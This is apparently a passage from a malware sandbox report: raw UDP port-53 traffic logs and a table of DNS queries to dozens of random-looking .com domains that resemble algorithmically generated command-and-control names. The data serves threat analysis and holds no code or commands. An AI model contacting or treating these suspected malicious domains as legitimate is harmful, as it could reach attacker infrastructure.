                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392090082 CET53510791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.396426916 CET53557441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403115988 CET53499831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403858900 CET53586591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.404027939 CET53639191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406135082 CET6318253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET5218053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406739950 CET5202853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.406979084 CET6173553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407196045 CET5297253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407308102 CET5894553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET6070453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407541037 CET6169053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407557011 CET5286553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET5114153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET5569953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.407851934 CET6127953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET6168653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408118010 CET5529453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408327103 CET5326553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET6219653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408576965 CET5506453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408830881 CET4990853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.408989906 CET5910953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET5681953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410247087 CET6251053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.410456896 CET5487153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.411586046 CET5942153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.414680004 CET53612791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.415659904 CET53552941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416290998 CET53607041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416296959 CET53617351.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416497946 CET53589451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417188883 CET53520281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417330027 CET53591091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417335987 CET53511411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417547941 CET53616861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417632103 CET53556991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417664051 CET53529721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417711020 CET53616901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417819023 CET53532651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.418150902 CET53528651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419030905 CET53550641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419389009 CET53621961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.423623085 CET53631821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.424851894 CET53548711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.428780079 CET53594211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.436870098 CET53521801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440511942 CET53499081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440965891 CET53625101.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.441071033 CET53568191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.541747093 CET53566651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.920490026 CET53521581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652163982 CET5806853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.652906895 CET5618653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.660641909 CET6461553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.663536072 CET5329553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.670610905 CET53646151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.673450947 CET53532951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.682539940 CET6005553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.695557117 CET53600551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696464062 CET5009853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696753025 CET5192453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.696822882 CET5888053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.705976009 CET53519241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.707140923 CET53500981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.708013058 CET53588801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.708913088 CET53561861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.710186005 CET5303753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.710944891 CET53580681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.711384058 CET5624953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.711750984 CET6320153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.712996006 CET6479953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.713526011 CET6347353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.713711977 CET5600153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714175940 CET5180953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714302063 CET6456053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.714899063 CET5910753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.715432882 CET5886953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.715833902 CET6458153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.716526985 CET5601353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.716918945 CET6245753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.717855930 CET5456553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.718132019 CET5501753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.719007969 CET5744253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.719320059 CET6287553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720046997 CET6049853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720366001 CET5467653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.720979929 CET6099053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721273899 CET5901553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721386909 CET53632011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721702099 CET53518091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721992016 CET53562491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722183943 CET5947753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722206116 CET53647991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722948074 CET5642253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.723125935 CET53645601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.723617077 CET53634731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724102020 CET5419553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724137068 CET53560011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724224091 CET5354853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724656105 CET5368753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.725210905 CET5181553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726013899 CET5242453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726026058 CET53628751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726300955 CET6348853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726527929 CET5819453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.727225065 CET6533853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.727775097 CET6366253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.728027105 CET6201753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729000092 CET53574421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729032040 CET5113053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729099035 CET53604981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729193926 CET53624571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729197979 CET6074853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729897022 CET5913953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730142117 CET53590151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730495930 CET53609901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730513096 CET5198553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.731066942 CET6179153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.731199980 CET53546761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.733011961 CET53518151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.734563112 CET53541951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.734710932 CET53524241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.735207081 CET53634881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.737582922 CET53519851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740257025 CET53591391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740477085 CET53607481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740832090 CET53617911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.741739035 CET53530371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.745394945 CET53620171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.746670008 CET53636621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.746934891 CET53560131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.747025967 CET53588691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.748275042 CET53545651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.748771906 CET53591071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.749167919 CET53550171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.753720999 CET53594771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.754719019 CET53564221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.755563021 CET53535481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.756365061 CET53536871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.758704901 CET53581941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.759447098 CET53511301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.817194939 CET5857153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.818289042 CET6329253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.829430103 CET53585711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.829473972 CET5293253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.830580950 CET5114953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.831501007 CET5246353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.832046986 CET4994453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.837268114 CET53511491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.839334965 CET5296953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.839818954 CET53529321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.841453075 CET53524631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.846914053 CET6279053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.849694967 CET53529691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.877768040 CET53627901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.881529093 CET53653381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.916079998 CET5704953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917156935 CET5629653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.917670012 CET5229553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918329000 CET6152253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.918715954 CET5211253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.919599056 CET5928053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920340061 CET6319253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.920814991 CET5807153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.924443007 CET4932753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.925867081 CET5169553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.927891016 CET53562961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.928985119 CET53521121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929101944 CET53615221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929783106 CET53522951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929824114 CET53592801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.930708885 CET53580711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.931050062 CET53631921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.934875011 CET53493271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.936007023 CET53516951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.947926044 CET53570491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.973043919 CET53632921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.034746885 CET53499441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.110709906 CET53645811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.561119080 CET5356353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.583281040 CET4939453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.875463009 CET53535631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.939996004 CET53493941.1.1.1192.168.2.8

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571039915 CET192.168.2.81.1.1.10xd1dStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571495056 CET192.168.2.81.1.1.10x4d37Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.571770906 CET192.168.2.81.1.1.10x3466Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.599442959 CET192.168.2.81.1.1.10xfac0Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.602844954 CET192.168.2.81.1.1.10x2c8cStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.629578114 CET192.168.2.81.1.1.10x9f6Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.631107092 CET192.168.2.81.1.1.10x809aStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.632698059 CET192.168.2.81.1.1.10xb5a7Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.634217024 CET192.168.2.81.1.1.10xc6c0Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.635745049 CET192.168.2.81.1.1.10x45c0Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.637389898 CET192.168.2.81.1.1.10x6984Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.639735937 CET192.168.2.81.1.1.10x323fStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.641026974 CET192.168.2.81.1.1.10x3c25Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.642386913 CET192.168.2.81.1.1.10x8061Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.643124104 CET192.168.2.81.1.1.10x9cabStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.866209030 CET192.168.2.81.1.1.10x15a2Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.870208025 CET192.168.2.81.1.1.10x6448Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878278971 CET192.168.2.81.1.1.10x1fcaStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.878598928 CET192.168.2.81.1.1.10x72acStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.880245924 CET192.168.2.81.1.1.10xba4dStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.881460905 CET192.168.2.81.1.1.10x12cfStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882561922 CET192.168.2.81.1.1.10xe57cStandard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.882962942 CET192.168.2.81.1.1.10x31dStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.883178949 CET192.168.2.81.1.1.10x2b5dStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927580118 CET192.168.2.81.1.1.10x387bStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927628994 CET192.168.2.81.1.1.10x80aStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927869081 CET192.168.2.81.1.1.10x779dStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.927998066 CET192.168.2.81.1.1.10x145bStandard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928175926 CET192.168.2.81.1.1.10xd01aStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928265095 CET192.168.2.81.1.1.10x51adStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928392887 CET192.168.2.81.1.1.10xa2d5Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.928879976 CET192.168.2.81.1.1.10x9350Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929109097 CET192.168.2.81.1.1.10x4641Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929553032 CET192.168.2.81.1.1.10x7cc3Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.929734945 CET192.168.2.81.1.1.10x163Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930448055 CET192.168.2.81.1.1.10x906bStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930636883 CET192.168.2.81.1.1.10x4d5fStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.930813074 CET192.168.2.81.1.1.10xa858Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931021929 CET192.168.2.81.1.1.10xd739Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931186914 CET192.168.2.81.1.1.10xdd21Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.931338072 CET192.168.2.81.1.1.10x1a95Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940445900 CET192.168.2.81.1.1.10xd459Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940640926 CET192.168.2.81.1.1.10x5216Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940813065 CET192.168.2.81.1.1.10x48e7Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.940951109 CET192.168.2.81.1.1.10x33b0Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941931009 CET192.168.2.81.1.1.10x72ecStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.941996098 CET192.168.2.81.1.1.10x7b4dStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942199945 CET192.168.2.81.1.1.10x46d4Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.942291975 CET192.168.2.81.1.1.10xbb47Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943231106 CET192.168.2.81.1.1.10xd79bStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943542004 CET192.168.2.81.1.1.10x289aStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943717957 CET192.168.2.81.1.1.10xd676Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943788052 CET192.168.2.81.1.1.10x6337Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.943950891 CET192.168.2.81.1.1.10x2095Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944082022 CET192.168.2.81.1.1.10x7720Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944273949 CET192.168.2.81.1.1.10xa38Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944427013 CET192.168.2.81.1.1.10x3403Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944586992 CET192.168.2.81.1.1.10x8d59Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944886923 CET192.168.2.81.1.1.10x24beStandard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.944982052 CET192.168.2.81.1.1.10x39aaStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945225000 CET192.168.2.81.1.1.10x1137Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.945400953 CET192.168.2.81.1.1.10x6456Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.950491905 CET192.168.2.81.1.1.10xf2a6Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.951400995 CET192.168.2.81.1.1.10xec91Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027020931 CET192.168.2.81.1.1.10x9b93Standard query (0)pupydeq.comA (IP address)IN (0x0001)false
